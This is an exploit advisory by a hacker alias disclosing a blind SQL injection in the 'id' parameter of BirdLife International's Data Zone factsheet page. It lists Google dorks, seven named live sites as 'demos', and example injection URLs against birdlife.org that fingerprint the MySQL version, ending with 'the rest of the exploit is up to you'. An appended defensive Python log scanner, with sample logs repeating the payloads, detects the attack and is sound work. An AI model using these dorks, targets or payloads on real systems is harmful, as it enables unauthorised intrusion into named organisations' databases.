The bug is not mine!
[+] Author : KnocKout
[~] E-mail: knockout@e-mail.com.tr
[~] HomePage : http://h4x0resec.blogspot.com - http://Cyber-warrior.org
|~| Greetings to old friends, we continue where we left off.
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : BirdLife International’s Data Zone
|~Price : N/A
|~Version : N/A
|~Software: http://www.qpqsoftware.com/qpq/portfolio
|~Vulnerability Style : Blind SQL Injection
|~Vulnerability Dir : /datazone/
|~Dorks:
inurl:speciesfactsheet.php
inurl:/datazone/ QPQ Software
|[~]Date : "4 SEPTEMBER 2014"
|[~]Tested on :
(L)Kali Linux,
(R)Apache 2.2.22, PHP 5.3.10
(R)MySQL 5.0.11
----------------------------------------------------------
speciesfactsheet.php: the 'id' parameter is not secured
--------------------------------------------------------
DEMOS;
http://worldbirdwatch.org/datazone/
http://www.spoonbilledsandpiper.info/datazone/
http://www.birdlife.org/datazone/
http://rarebirdclub.org/datazone/
http://www.save-spoony.info/datazone/
www.worldbirdfestival.org/datazone/
http://bl-www.spoiledmilkclients.com/datazone/
~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|{~~~~~~~~ Exploitation| Blind SQL Injection~~~~~~~~~~~}|
HTTP://{TARGET}/datazone/speciesfactsheet.php?id= //SQL command
Example;
MySQL version?
SQL Injecting : www.birdlife.org/datazone/speciesfactsheet.php?id=359 and substring(@@version,1,1)=4 {FALSE}
SQL Injecting Retry : www.birdlife.org/datazone/speciesfactsheet.php?id=359 and substring(@@version,1,1)=5 {TRUE}
The rest of the exploit is up to you.
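A defender-side check for the request pattern shown above, as an added example that is not part of the original advisory: it scans web-server access logs for requests to speciesfactsheet.php whose id value is not a plain integer, and lists clients whose injected requests received differing response sizes. The log lines, client addresses and function names are constructed for illustration, and common log format is assumed.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in common log format; not taken from any real server.
SAMPLE_LOG = """\
203.0.113.7 - - [04/Sep/2014:10:00:01 +0000] "GET /datazone/speciesfactsheet.php?id=359 HTTP/1.1" 200 5120
203.0.113.9 - - [04/Sep/2014:10:00:05 +0000] "GET /datazone/speciesfactsheet.php?id=359%20and%20substring(@@version,1,1)=4 HTTP/1.1" 200 812
203.0.113.9 - - [04/Sep/2014:10:00:06 +0000] "GET /datazone/speciesfactsheet.php?id=359+and+substring(@@version,1,1)=5 HTTP/1.1" 200 5120
198.51.100.4 - - [04/Sep/2014:10:01:00 +0000] "GET /datazone/index.php?id=abc HTTP/1.1" 200 900
"""

REQUEST_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3}) (\d+|-)')
TARGET_SCRIPT = "/datazone/speciesfactsheet.php"


def find_suspicious_requests(log_text):
    """Return (client, decoded id value, response size) for every request to
    the factsheet script whose id parameter is not a plain integer."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, _status, size = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith(TARGET_SCRIPT):
            continue
        # parse_qs percent-decodes the value and turns '+' into a space.
        for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
            if not re.fullmatch(r"[0-9]+", value):
                hits.append((client, value, size))
    return hits


def clients_with_response_oracle(hits):
    """Clients whose flagged requests got differing response sizes, the
    TRUE/FALSE signal a blind injection depends on."""
    sizes = defaultdict(set)
    for client, _value, size in hits:
        sizes[client].add(size)
    return sorted(c for c, seen in sizes.items() if len(seen) > 1)


if __name__ == "__main__":
    flagged = find_suspicious_requests(SAMPLE_LOG)
    for client, value, size in flagged:
        print(f"{client} id={value!r} bytes={size}")
    print("response oracle observed by:", clients_with_response_oracle(flagged))
```

The same integer-only rule belongs in the application itself: reject any id that is not all digits before it reaches the query, and bind it as a parameter rather than concatenating it.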
================================================================
Source: h4x0re Security:
http://h4x0resec.blogspot.com.tr/2014/09/0day-birdlife-internationals-data-zone.html